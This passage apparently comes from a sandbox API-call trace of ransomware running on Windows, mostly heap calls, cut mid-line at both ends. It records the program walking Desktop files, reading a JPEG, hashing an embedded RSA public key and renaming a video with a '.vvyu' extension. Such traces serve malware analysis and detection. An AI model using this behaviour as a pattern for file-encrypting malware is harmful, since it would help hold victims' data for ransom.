hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0188.188] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0188.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40528 [0188.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0188.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0188.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0188.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d8f8 [0188.188] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0188.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0188.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0188.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0188.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0188.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0188.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0188.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0188.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d850 [0188.188] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0188.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0188.188] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0188.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0188.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0188.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0188.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0188.188] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d868 [0188.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0188.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0188.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0188.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d838 [0188.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0188.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d910 [0188.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0188.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7de0 [0188.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0188.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d8e0 [0188.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0188.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d880 [0188.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0188.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d928 [0188.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d880 | out: hHeap=0x2c0000) returned 1 [0188.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d880 [0188.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d8e0 | out: hHeap=0x2c0000) returned 1 [0188.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0188.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0188.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0188.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0188.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0188.189] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d850 | out: hHeap=0x2c0000) returned 1 [0188.189] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d850 [0188.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0188.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2ae6ae8 [0188.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d8f8 | out: hHeap=0x2c0000) returned 1 [0188.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0188.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d928 | out: hHeap=0x2c0000) returned 1 [0188.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2ae6cf8 [0188.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0188.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0188.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0188.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0188.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d850 | out: hHeap=0x2c0000) returned 1 [0188.190] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2ae6f10 [0188.190] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0188.191] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae02d8 [0188.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0188.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0188.191] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0188.192] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae02d8 | out: hHeap=0x2c0000) returned 1 [0188.192] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0188.192] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0188.192] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6cf8 | out: hHeap=0x2c0000) returned 1 [0188.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6f10 | out: hHeap=0x2c0000) returned 1 [0188.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0188.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0188.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d880 | out: hHeap=0x2c0000) returned 1 [0188.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0188.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d910 | out: hHeap=0x2c0000) returned 1 [0188.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0188.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d868 | out: hHeap=0x2c0000) returned 1 [0188.193] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d838 | out: hHeap=0x2c0000) returned 1 [0188.194] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0188.194] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0188.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0188.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d820 | out: hHeap=0x2c0000) returned 1 [0188.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2020 | out: hHeap=0x2c0000) returned 1 [0188.195] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6ae8 | out: hHeap=0x2c0000) returned 1 [0188.197] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0188.197] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0188.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0188.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0188.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0188.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0188.198] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f90 | out: hHeap=0x2c0000) returned 1 [0188.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0188.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0188.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0188.199] WriteFile (in: hFile=0x584, lpBuffer=0x2ae3ea0*, nNumberOfBytesToWrite=0x2c36, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ae3ea0*, lpNumberOfBytesWritten=0x2f9fb14*=0x2c36, lpOverlapped=0x0) returned 1 [0188.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0188.200] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x2c3b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.200] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0188.201] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0188.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2eba0 [0188.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2ae3ea0 [0188.201] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ae3ea0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0188.201] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2ae42d0 [0188.201] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0188.201] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2eba0 | out: hHeap=0x2c0000) returned 1 [0188.201] WriteFile (in: hFile=0x584, lpBuffer=0x2ae42d0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae42d0*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0188.202] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae42d0 | out: hHeap=0x2c0000) returned 1 [0188.202] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0188.202] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0188.202] CloseHandle (hObject=0x584) returned 1 [0188.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40528 [0188.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x2ae3ea0 [0188.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40528 | out: hHeap=0x2c0000) returned 1 [0188.204] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\Bkw1.mp4" (normalized: "c:\\users\\keecfmwgj\\desktop\\bkw1.mp4"), lpNewFileName="C:\\Users\\kEecfMwgj\\Desktop\\Bkw1.mp4.vvyu" (normalized: "c:\\users\\keecfmwgj\\desktop\\bkw1.mp4.vvyu")) returned 1 [0188.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae3ea0 | out: hHeap=0x2c0000) returned 1 [0188.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.205] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0188.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0188.208] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7e7f4710, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0188.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2020 [0188.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5e) returned 0x2a2ed40 [0188.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2020 | out: hHeap=0x2c0000) returned 1 [0188.209] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\desktop.ini") returned=".ini" [0188.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0188.209] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34401c80, ftCreationTime.dwHighDateTime=0x1d89f70, ftLastAccessTime.dwLowDateTime=0x8a15bdc0, ftLastAccessTime.dwHighDateTime=0x1d8a2c4, ftLastWriteTime.dwLowDateTime=0x8a15bdc0, ftLastWriteTime.dwHighDateTime=0x1d8a2c4, nFileSizeHigh=0x0, nFileSizeLow=0x13f78, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="djRHD.jpg", cAlternateFileName="")) returned 1 [0188.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2020 [0188.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5e) returned 0x2a2ed40 [0188.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2020 | out: hHeap=0x2c0000) returned 1 [0188.210] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Desktop\\djRHD.jpg") returned=".jpg" [0188.210] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\djRHD.jpg" (normalized: "c:\\users\\keecfmwgj\\desktop\\djrhd.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0188.210] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=81784) returned 1 [0188.210] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0188.213] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x13f52, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.214] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0188.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0188.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0188.215] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0188.215] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x13f78, lpOverlapped=0x0) returned 1 [0188.216] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.216] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0188.216] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.216] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0188.216] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0188.217] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0188.217] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0188.217] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0188.217] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0188.217] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0188.217] GetLastError () returned 0x0 [0188.217] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0188.217] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0188.218] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0188.218] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0188.218] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0188.218] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0188.218] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0188.218] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0188.218] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0188.218] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x13f80) returned 0x2af5168 [0188.219] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0188.219] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0188.219] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0188.219] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0188.219] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0188.219] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f90 [0188.219] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae2020 [0188.219] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d820 [0188.219] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2ae1fd8 [0188.219] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d838 [0188.219] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d868 [0188.219] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d910 [0188.219] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d880 [0188.220] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0188.220] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2f5b18 [0188.220] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2f5b18, Size=0x218) returned 0x2ae3ea0 [0188.220] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2ae40c0 [0188.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d868 | out: hHeap=0x2c0000) returned 1 [0188.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d880 | out: hHeap=0x2c0000) returned 1 [0188.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0d910 | out: hHeap=0x2c0000) returned 1 [0188.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0188.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae40c0 | out: hHeap=0x2c0000) returned 1 [0188.220] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0d910 [0188.220] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0188.220] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0d880 [0188.220] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0188.220] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2a0d868 [0188.220] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0188.221] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0188.221] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0188.221] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0188.221] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, 